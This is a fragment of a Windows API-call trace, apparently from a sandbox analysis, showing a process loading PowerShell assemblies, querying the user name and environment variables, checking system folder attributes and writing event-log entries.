	[0794.278] GetUserNameW (in: lpBuffer=0x2e1ec0, pcbBuffer=0x16d8a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8a8) returned 1
	[0794.278] CoTaskMemFree (pv=0x2e1ec0) 
	[0794.279] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ed79f8*="Registry", lpRawData=0x2ed7788) returned 1
	[0794.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0794.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0794.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0794.545] CoTaskMemAlloc (cb=0x804) returned 0x1b768af0
	[0794.545] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b768af0, nSize=0x16d868 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d868) returned 0x1
	[0794.546] CoTaskMemFree (pv=0x1b768af0) 
	[0794.546] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0794.546] GetUserNameW (in: lpBuffer=0x2e1ec0, pcbBuffer=0x16d8a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8a8) returned 1
	[0794.546] CoTaskMemFree (pv=0x2e1ec0) 
	[0794.547] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2edce10*="Variable", lpRawData=0x2edcba0) returned 1
	[0794.638] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0794.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0794.638] CoTaskMemFree (pv=0x1b742350) 
	[0794.641] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0794.641] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0794.641] CoTaskMemFree (pv=0x1b742350) 
	[0794.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0794.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0794.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0794.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0794.681] CoTaskMemAlloc (cb=0x804) returned 0x1b768af0
	[0794.681] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b768af0, nSize=0x16d868 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d868) returned 0x1
	[0795.790] CoTaskMemFree (pv=0x1b768af0) 
	[0795.790] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0795.790] GetUserNameW (in: lpBuffer=0x2e1ec0, pcbBuffer=0x16d8a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8a8) returned 1
	[0795.791] CoTaskMemFree (pv=0x2e1ec0) 
	[0795.791] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ef0c68*="Certificate", lpRawData=0x2ef09f8) returned 1
	[0796.860] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0796.860] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0796.860] CoTaskMemFree (pv=0x1b742350) 
	[0796.862] CoTaskMemAlloc (cb=0x20e) returned 0x33e690
	[0796.862] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x33e690 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0796.862] CoTaskMemFree (pv=0x33e690) 
	[0796.863] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0796.863] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0796.863] CoTaskMemFree (pv=0x1b742350) 
	[0796.863] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0796.863] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0796.864] CoTaskMemFree (pv=0x1b742350) 
	[0796.875] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0796.875] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0796.875] CoTaskMemFree (pv=0x1b742350) 
	[0796.877] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0796.877] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0796.877] CoTaskMemFree (pv=0x1b742350) 
	[0796.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0796.878] SetErrorMode (uMode=0x1) returned 0x1
	[0796.879] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d4b0 | out: lpFileInformation=0x16d4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0798.076] SetErrorMode (uMode=0x1) returned 0x1
	[0798.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0798.077] SetErrorMode (uMode=0x1) returned 0x1
	[0798.077] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d4b0 | out: lpFileInformation=0x16d4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0798.077] SetErrorMode (uMode=0x1) returned 0x1
	[0798.078] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0798.078] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0798.078] CoTaskMemFree (pv=0x1b742350) 
	[0798.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0798.088] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d260, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0798.088] SetErrorMode (uMode=0x1) returned 0x1
	[0798.088] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d470 | out: lpFileInformation=0x16d470*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0798.088] SetErrorMode (uMode=0x1) returned 0x1
	[0798.088] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d260, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0798.088] SetErrorMode (uMode=0x1) returned 0x1
	[0798.088] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d470 | out: lpFileInformation=0x16d470*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0798.089] SetErrorMode (uMode=0x1) returned 0x1
	[0798.089] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d270, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0798.089] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0798.089] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0798.089] SetErrorMode (uMode=0x1) returned 0x1
	[0798.089] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d470 | out: lpFileInformation=0x16d470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0798.089] SetErrorMode (uMode=0x1) returned 0x1
	[0798.089] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0798.089] SetErrorMode (uMode=0x1) returned 0x1
	[0798.090] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d470 | out: lpFileInformation=0x16d470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0798.090] SetErrorMode (uMode=0x1) returned 0x1
	[0798.090] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0798.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0798.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0798.090] SetErrorMode (uMode=0x1) returned 0x1
	[0798.090] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d470 | out: lpFileInformation=0x16d470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0798.090] SetErrorMode (uMode=0x1) returned 0x1
	[0798.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0798.090] SetErrorMode (uMode=0x1) returned 0x1
	[0798.091] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d470 | out: lpFileInformation=0x16d470*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0798.091] SetErrorMode (uMode=0x1) returned 0x1
	[0798.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0798.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x16d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0798.091] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0798.091] SetErrorMode (uMode=0x1) returned 0x1
	[0798.091] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d4b0 | out: lpFileInformation=0x16d4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0798.092] SetErrorMode (uMode=0x1) returned 0x1
	[0798.092] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0798.092] SetErrorMode (uMode=0x1) returned 0x1
	[0798.092] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d4b0 | out: lpFileInformation=0x16d4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0798.092] SetErrorMode (uMode=0x1) returned 0x1
	[0798.092] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0798.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x16d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0798.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0798.092] SetErrorMode (uMode=0x1) returned 0x1
	[0798.092] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d4b0 | out: lpFileInformation=0x16d4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0798.093] SetErrorMode (uMode=0x1) returned 0x1
	[0798.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0798.093] SetErrorMode (uMode=0x1) returned 0x1
	[0798.093] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d4b0 | out: lpFileInformation=0x16d4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0798.093] SetErrorMode (uMode=0x1) returned 0x1
	[0798.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0798.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x16d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0798.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0798.102] SetErrorMode (uMode=0x1) returned 0x1
	[0798.102] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d770 | out: lpFileInformation=0x16d770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0798.102] SetErrorMode (uMode=0x1) returned 0x1
	[0798.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0798.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0798.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0798.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0799.171] CoTaskMemAlloc (cb=0x804) returned 0x1b768af0
	[0799.171] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b768af0, nSize=0x16dad8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16dad8) returned 0x1
	[0799.171] CoTaskMemFree (pv=0x1b768af0) 
	[0799.171] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0799.171] GetUserNameW (in: lpBuffer=0x2e1ec0, pcbBuffer=0x16db18 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16db18) returned 1
	[0799.171] CoTaskMemFree (pv=0x2e1ec0) 
	[0799.172] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f29950*="Available", lpRawData=0x2f296e0) returned 1
	[0800.059] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0800.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.059] CoTaskMemFree (pv=0x1b742350) 
	[0800.060] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0800.061] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.061] CoTaskMemFree (pv=0x1b742350) 
	[0800.064] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0800.064] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0800.064] CoTaskMemFree (pv=0x1b742350) 
	[0800.064] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0800.064] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0800.064] CoTaskMemFree (pv=0x1b742350) 
	[0800.068] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16daf8 | out: phkResult=0x16daf8*=0x3a0) returned 0x0
	[0800.068] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16da7c, lpData=0x0, lpcbData=0x16da78*=0x0 | out: lpType=0x16da7c*=0x1, lpData=0x0, lpcbData=0x16da78*=0x56) returned 0x0
	[0800.068] CoTaskMemAlloc (cb=0x5a) returned 0x1b755d20
	[0800.068] RegQueryValueExW (in: hKey=0x3a0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16da4c, lpData=0x1b755d20, lpcbData=0x16da48*=0x56 | out: lpType=0x16da4c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16da48*=0x56) returned 0x0
	[0800.068] CoTaskMemFree (pv=0x1b755d20) 
	[0800.068] RegCloseKey (hKey=0x3a0) returned 0x0
	[0800.070] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0800.070] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.070] CoTaskMemFree (pv=0x1b742350) 
	[0800.980] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0800.980] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.980] CoTaskMemFree (pv=0x1b742350) 
	[0800.985] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0800.985] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.985] CoTaskMemFree (pv=0x1b742350) 
	[0800.986] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0800.986] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.986] CoTaskMemFree (pv=0x1b742350) 
	[0800.986] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0800.986] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.987] CoTaskMemFree (pv=0x1b742350) 
	[0800.988] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0800.988] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.988] CoTaskMemFree (pv=0x1b742350) 
	[0800.989] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
	[0800.989] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742350, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.990] CoTaskMemFree (pv=0x1b742350) 
	[0800.990] CoTaskMemAlloc (cb=0x104) returned 0x1b742350
